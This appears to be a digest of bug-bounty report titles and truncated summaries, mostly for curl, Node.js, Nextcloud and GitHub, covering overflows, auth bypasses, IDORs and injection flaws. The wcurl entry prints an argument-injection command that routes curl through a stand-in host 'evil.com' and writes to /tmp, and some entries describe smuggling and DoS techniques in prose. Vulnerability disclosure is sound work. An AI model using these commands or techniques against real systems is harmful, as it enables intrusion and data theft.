IBM: SQL Injection vulnerability found on ibm.com endpoint

A SQL injection vulnerability was found on an ibm.com endpoint. The vulnerability was reported to IBM, analyzed, and remediated...

curl: Curl Telnet Handler Buffer Overflow

Summary: I found a buffer overflow in curl's telnet protocol handler that allows remote memory corruption without authentication. The bug is in the CURLSBACCUM macro in lib/telnet.c line 69, where the bounds check lets you write one byte past the end of a 512-byte buffer. When curl receives 512+...

curl: RTSP RTP Interleaved Parser Assertion Failure (Zero-Length RTP Payload)

Summary: I am submitting this as a security issue primarily due to how it was discovered and that it's my first Curl submission, but I suspect I might be overly cautious here. This issue was discovered as part of the AIXCC competition, and I am assisting on reporting true positive findings to...

curl: Integer Overflow in curl_multi_get_handles() Leading to Heap Buffer Overflow

Integer Overflow in curlmultigethandles Leading to Heap Buffer Overflow Summary The curlmultigethandles function in lib/multi.c contains an integer overflow vulnerability when the number of easy handles in a multi handle approaches UINTMAX 4,294,967,295. When count == UINTMAX, the expression coun...

curl: Able to bypass HSTS using trailing dot

Summary: curl allows users to load a HSTS cache which will cause curl to use HTTPS instead of HTTP given a HTTP URL for a given site specified in the HSTS cache. Affected version curl version used for reproducing this issue is: 8.16.0 curl --version curl 8.16.0 Windows libcurl/8.16.0 Schannel...

Nextcloud: Group restriction bypass via bearer token in user_oidc (SETTING_RESTRICT_LOGIN_TO_GROUPS not enforced in Backend::getCurrentUserId)

A security inconsistency was identified in the useroidc app where group-based login restrictions were enforced in the browser OIDC flow but not in bearer token validation. This could have allowed users outside whitelisted groups to access the Nextcloud API with a valid bearer token...

Rocket.Chat: Complete authentication bypass to admin permissions

Vulnerability description not provided...

Node.js: Denial of Service via `__proto__` header name in `req.headersDistinct` (Uncaught `TypeError` crashes Node.js process)

Vulnerability description not provided...

GitHub: Cross-repository IDOR in `/settings/security_analysis/bypass_reviewers` allows unauthorized delegated bypass reviewer modification

A vulnerability was identified in GitHub Enterprise Server that allowed an attacker with admin access on one repository to modify the secret scanning push protection delegated bypass reviewer list on another repository. Authorization was verified against the repository in the URL, but the action...

Node.js: Node.js Permission Model bypass: UDS server bind/listen works without `--allow-net`

Vulnerability description not provided...

Python Cryptographic Authority: Fail-Open in set_tlsext_servername_callback on pyopenssl via unhandled exceptions leads to security bypass

A vulnerability was discovered in the pyopenssl library's handling of the Server Name Indication SNI callback settlsextservernamecallback. The internal wrapper for this callback catches all Python exceptions raised by user code but returns 0 Success/SSLTLSEXTERROK to the underlying OpenSSL engine...

AWS VDP: Arbitrary Code Execution via Scanner Bypass in **aws-diagram-mcp-server** `exec()` Namespace

Description: The aws-diagram-mcp-server contains an arbitrary code execution vulnerability in diagramstools.py. User-supplied Python code is executed via execcode, namespace at line 305 with a namespace containing the full os module, urlretrieve, and Python builtins. A security scanner scanner.py...

PortSwigger Web Security: HTML Injection in DAST Trial Request Form Confirmation Email – PortSwigger

A vulnerability was discovered in the DAST trial request form on the website, where user input in the "First Name" field was not properly sanitized before being included in confirmation emails. This allowed the injection of arbitrary HTML content, which would be rendered in the recipient's email...

Node.js: Incomplete fix for CVE-2026-21637: loadSNI() in _tls_wrap.js lacks try/catch leading to Remote DoS

A flaw was discovered in the Node.js TLS error handling that left SNICallback invocations unprotected against synchronous exceptions. This represented an incomplete fix of the prior CVE-2026-21637 vulnerability, where the equivalent ALPN and PSK callbacks were already addressed. The issue could...

Node.js: Assertion error in node_url.cc via malformed URL format leads to Node.js crash

An assertion error in nodeurl.cc via malformed URL format leads to a Node.js crash. A flaw in the URL processing caused an assertion failure in the native code when url.format was called with a malformed internationalized domain name containing invalid characters, crashing the Node.js process. Th...

Basecamp: Improper Access Control in `fizzy.do` import flow allows cross-tenant ActionText reference resolution and data disclosure

The vulnerability allowed for cross-tenant ActionText reference resolution and data disclosure during the account import flow. The import process did not properly verify the ownership of the referenced records before minting signed global IDs, enabling an attacker to access and disclose data from...

RubyGems: Server-side ReDoS via user-controlled regex in OIDC Access Policy

The OIDC Access Policy implementation evaluated user-supplied regular expressions against JWT claim values using Ruby's Regexp engine without any timeout or complexity validation. The vulnerable code path was Regexp.newvalue.match?claimvalue, where value was fully user-controlled and claimvalue w...

Node.js: Timing side-channel in HMAC verification via memcmp() in crypto_hmac.cc leads to potential MAC forgery

Vulnerability description not provided...

Node.js: Memory leak in Node.js HTTP/2 server via WINDOW_UPDATE on stream 0 leads to resource exhaustion

Vulnerability description not provided...

curl: MQTT Protocol Packet Injection via Unchecked CONNACK Remaining Length

I'm not sure if this is a vulnerability or intended behavior, but I noticed that curl MQTT implementation accepts CONNACK packets with Remaining Length values greater than 2, which appears to violate the MQTT v3.1.1 specification. According to the MQTT spec, CONNACK packets should have a Remainin...

GitHub: Add labels to arbitrary issues/prs & compromise github actions label checks

A vulnerability was identified that allowed a user with read access to a repository and write access to a project to modify issue and pull request metadata through the project. When adding an item to a project that already existed, column value updates were applied without verifying the actor's...

Fastify: DoS via Unbounded Memory Allocation in sendWebStream on Fastify v5.7.0+ leads to OOM crash when backpressure is ignored

A vulnerability was discovered in Fastify versions 5.7.0 and later. The issue was in the "sendWebStream" function, which failed to handle TCP backpressure correctly. When a ReadableStream was sent as a response, Fastify continuously pulled data from the stream producer and wrote it to the respons...

curl: wcurl Argument Injection via Unquoted Variable

when i was code auditing curl i stumbled uppon a vulnerablity that was on wcurl affected version:current step 1: open terminal step 2:run pocs below wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...

Tucows (VDP): Password Strength Policy Bypass via Server-Side Validation Flaw

A password strength policy bypass was discovered due to a server-side validation flaw. The password strength policy was only enforced in the browser, not on the server side...

curl: Integer Underflow in src/var.c

Summary: A potential Integer Underflow vulnerability was identified in the setvariable function within src/var.c. the flaw occurs during the calculation of the variable content length clen when a byte range is specified. specifically, the code fails to validate if startoffset is greater than...

GitHub: PATs without the required scope can leak issues

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token PAT lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

Nextcloud: View-only guests could see deleted Collectives pages in the trashbin

A vulnerability was discovered where view-only guests could see deleted Collectives pages in the trashbin...

Nextcloud: IDOR on ██████ via direct photo URL leads to unauthorized access to deleted and other users' photos

Summary: An Insecure Direct Object Reference IDOR vulnerability exists in the application that allows unauthorized access to photos belonging to other users. The application does not properly validate whether the logged-in user is authorized to access a photo when accessing it via direct URL. Thi...

Weblate: Argument Injection in /manage/ssh/ via host parameter leads to sensitive file disclosure on Weblate

A vulnerability was discovered in the SSH management interface of Weblate, a web-based translation tool. The vulnerability allowed an attacker with administrative privileges to inject command-line arguments into the host parameter, leading to sensitive file disclosure on the server. The vulnerabl...

curl: SSL options ISSUERCERT, EC_CURVES and CRLFILE silently ignored by non-OpenSSL backends

Summary: The SSL options ISSUERCERT, ECCURVES and CRLFILE are silently ignored for e.g. the mbedTLS backend, which allows MITM attacks for the ISSUERCERT and CRLFILE bug, and can reduce the security and compliance by ignoring the specified curve for the ECCURVES bug. Affected version Tested with...

curl: Cross‑origin cookies leak and injection risk when using a custom Host header

Summary When a custom hostname is specified, it is used for cookie matching if the cookie engine is also enabled for this transfer. This matching persists in cross-origin redirects despite that the originally supplied hostname is removed. cookiehost is set from a custom Host header: lib/http.c...

curl: Cookie Replacement Use-After-Free Vulnerability

Summary: The cookie replacement logic in lib/cookie.c contains a use-after-free vulnerability in the replaceexisting function. The function modifies a linked list while iterating over it, creating potential for memory corruption in concurrent or complex cookie operations. Vulnerable Code Location...

curl: Cookie Max-Age Integer Overflow Vulnerability

Summary: The cookie parsing code in lib/cookie.c contains an integer overflow vulnerability when processing the Max-Age attribute of HTTP cookies. The vulnerable code attempts to add the max-age value to the current timestamp without adequate overflow protection While the code includes an overflo...

Sony: Improper State Validation on Sony WH-CH520 via BLE Command Service leads to unauthorized Bluetooth pairing and audio hijacking

A vulnerability was discovered in the firmware of the Sony WH-CH520 headset. The vulnerability allowed an unauthenticated write to a proprietary Sony command service via Bluetooth Low Energy BLE, causing the device to become discoverable and accept a standard Bluetooth Security Manager Protocol S...

curl: libcurl: Improper Authentication State Management on Cross-Protocol Redirects

Following the recent advisory for CVE-2025-14524, I conducted an investigation into how libcurl manages OAuth2 credentials during complex redirect chains. I have confirmed that while the library successfully protects traditional user credentials, it fails to clear OAuth2 Bearer tokens in the same...

AWS VDP: Password Reuse Vulnerability on AWS Sign-in Page via Password Reset Flow leads to Security Policy Violation

Asset URL: ██████ Summary: The AWS sign-in page allows users to reuse old passwords when resetting their password, which violates security best practices outlined in OWASP Authentication Cheat Sheet and NIST 800-63B Digital Identity Guidelines. This misconfiguration could potentially weaken accou...

Nextcloud: Private circle can be added to another circle via API despite visibility restriction

A vulnerability was discovered where private circles could be added to other circles via the API, despite visibility restrictions...

Node.js: HashDoS in V8

Vulnerability description not provided...

Cosmos: Memory Exhaustion in CometBFT v1.0.1 via malicious ProposalMessage leads to network-wide denial of service

Summary of Impact CometBFT v1.0.1 contains a critical memory exhaustion vulnerability that allows any peer to crash nodes with a single 50-byte P2P message. An attacker can send a malicious ProposalMessage with PartSetHeader.Total set to 2^32-1, causing the receiving node to immediately allocate...

GoCD: Information Disclosure via Logback Configuration Injection in GoCD Agent

Summary The GoCD Agent's logging mechanism Logback allows for property substitution and custom configuration loading. By default, the config directory might not exist in the installation path. However, if an attacker creates this directory and places a specially crafted agent-launcher-logback.xml...

curl: Directory listing vulnerability is disclosing names and emails, widespread (thousands of records, publicly accessible without auth)

Summary: directory listing vulnerability is disclosing names and emails and so many other sensitive information, that significantly increases the severity because these are considered as PII Personally Identifiable Information. Thousands of records, publicly accessible without auth also can be...

curl: IMAP Protocol Desynchronization and Response Smuggling via Naive Literal Parsing

libcurl incorrectly parses IMAP literals size even when they are embedded within quoted strings e.g., email subjects or headers. This behavior violates RFC 3501, which mandates that content inside double quotes must be treated as opaque text. This parsing error causes the client state machine to...

curl: MQTT: unsigned integer underflow bypasses MAX_MQTT_MESSAGE_SIZE check

Summary An unsigned integer underflow exists in libcurl's MQTT publish path. Due to incorrect arithmetic ordering in the size validation logic, oversized MQTT PUBLISH messages are not rejected as intended. Affected version libcurl 8.18.0 Tested on macOS arm64 with AddressSanitizer enabled. Steps ...

curl: Digest Authentication Header Injection

Summary The Digest authentication implementation in libcurl fails to properly escape the uri parameter in the Authorization header. While other parameters like username, realm, and nonce are correctly escaped using authdigeststringquoted, the uri is inserted raw into the header. This allows an...

curl: Gopher Protocol Command Injection (SSRF Smuggling)

Summary The curl Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to "smuggle" additional Gopher selectors or arbitrary commands into a single Gopher request. By using %0d%0a in the URL, an attacker can break the...

curl: Use-After-Free in curl_easy_nextheader when reusing header handle across requests

. The API returns struct curlheader objects that internally reference libcurl-owned linked list nodes. When a new request is performed on the same CURL handle, libcurl frees and rebuilds the internal header list, but previously returned struct curlheader objects remain valid to the application an...

curl: integer Overflow in MQTT Protocol Handling Allows Bypassing Message Size Limit

Summary: A logic error involving an integer overflow specifically, an unsigned integer underflow exists in the lib/mqtt.c file within the mqttpublish function. This vulnerability allows an attacker or a malicious user configuration to bypass the explicit MAXMQTTMESSAGESIZE check. The vulnerabilit...

curl: Integer-underflow leads to heap over-read in TFTP implementation

libcurl on commit 3ee1d3b573e6ea36fb478dbd0d9913483b900928 contains a vulnerability in its TFTP implementation that can cause curl or a libcurl-user to send heap memory beyond the bounds of an allocated chunk to a malicious TFTP server. The vulnerability lies in lib/tftp.c, in function...

MetaMask: Authorization Bypass in Starknet Snap via enableAuthorize parameter leads to unauthorized transaction signing

A critical security vulnerability was discovered in the Starknet Snap by Consensys. The vulnerability allowed malicious websites to bypass user authorization when signing messages or transactions. The vulnerability existed in the enableAuthorize parameter, which could be controlled by any website...

GitHub: Missing Access Control in MigrationFile allows attacker to upload files to any Migration

A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed unauthorized content to be uploaded to a user's repository migration export due to a missing authorization check in the repository migration upload endpoint. The vulnerability could be exploited by...